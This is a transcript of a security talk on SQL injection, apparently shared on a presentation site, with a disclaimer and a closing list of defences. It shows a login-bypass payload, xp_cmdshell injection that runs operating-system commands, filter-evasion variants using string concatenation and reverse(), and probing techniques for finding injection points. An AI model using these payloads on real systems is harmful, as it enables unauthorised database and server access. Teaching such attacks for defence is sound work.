How did i steal your database
This presentation is the property of its rightful owner.
Sponsored Links
1 / 18

How Did I Steal Your Database PowerPoint PPT Presentation


  • 46 Views
  • Uploaded on
  • Presentation posted in: General

How Did I Steal Your Database. Mostafa Siraj. @mostafasiraj. Agenda. Noooo, it kills suspense. DISCLAIMER. Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account. SQL Injection. What is it?

Download Presentation

How Did I Steal Your Database

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


How did i steal your database

How Did I Steal Your Database

Mostafa Siraj

@mostafasiraj


Agenda

Agenda

Noooo, it kills suspense


How did i steal your database

DISCLAIMER

  • Hacking websites is ILLEGAL

  • This presentation is meant for educational purposes ONLY

  • Only use this stuff on YOUR website and YOUR account


Sql injection

SQL Injection

What is it?

The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.


Sql injection example bypassing logon

SQL Injection Example, Bypassing Logon

  • Original SQL Query

  • String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND

  • pass='" + password + "'“

  • …..

  • Setting username to Mostafa & password to ' OR '1'= '1 produces

  • SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'

  • Attacker is logged on without Authentication


Not only your web app and db are at risk

Not only your web app and DB are at risk

  • Depending on the DB, an attacker can access the operating system

  • MS SQL Server: Execute OS command xp_cmdshell

  • Set username to '; exec master.dbo.xp_cmdshell "dir";-- produces

  • SELECT * FROM user WHERE

  • name=''; exec master.dbo.xp_cmdshell "dir"; --

  • Note: dir list directory content


How did i steal your database

Let's play Hide and Seek

  • Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --

  • Defender: Disallow double quotes:

    • Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --

  • Defender: Filter out string “xp_cmdshell”

    • Attacker: ';declare @a varchar(1000);

      set @a = 'master.dbo.xp_' + 'cmdshell dir';

      exec (@a);--

  • Defender: Filter out “xp”, “cmd”, “shell”, ….

    • Attacker: ';declare @a varchar(1000);

      set @a = reverse('rid llehsdmc_px.obd.retsam');

      exec (@a);--


Finding sql injection bugs

Finding SQL Injection Bugs


Finding sql injection bugs1

Finding SQL Injection Bugs

  • Submit single quotation mark and observe the result

  • Submit two single quotation and observe the result

  • Identify the database (e.g.

    • Oracle: ‘||’FOO

    • MS-SQL: ‘+’FOO

    • MySQL: ‘ ‘FOO [note the space btw the 2 quotes]


Finding sql injection bugs2

Finding SQL Injection Bugs

  • For multistate processes, complete all the states before observing the results

  • For search fields try using the wildcard character %


Finding sql injection bugs3

Finding SQL Injection Bugs

  • For numeric data, if the original value was 2 try submitting

  • 1+1 or 3-1

  • If successful try using SQL-specific keywords, e.g.

  • 67-ASCII(‘A’)

  • If single quotes are filtered try

  • 51-ASCII(1)[note ASCII(1)=49]


Inject into different statement types

Inject into different statement types

  • You can do the same for all SQL statements (INSERT, UPDATE or DELETE)

  • Watch out when injecting in UPDATE or DELETE


How did i steal your database

Demo

WebGoat


How did i steal your database

Demo

HacmeBank


How did i steal your database

Demo

Using UNION Operator


How did i steal your database

Demo

MS-SQL Error


Solution

Solution

  • Validate the input -accept only known good-

  • Process SQL queries using prepared statements, parameterized queries, or stored procedures.

  • Enforce least privilege

  • Avoid detailed error messages

  • Show care when using stored procedures (e.g. exec)


How did i steal your database

Thank You

@mostafasiraj


  • Login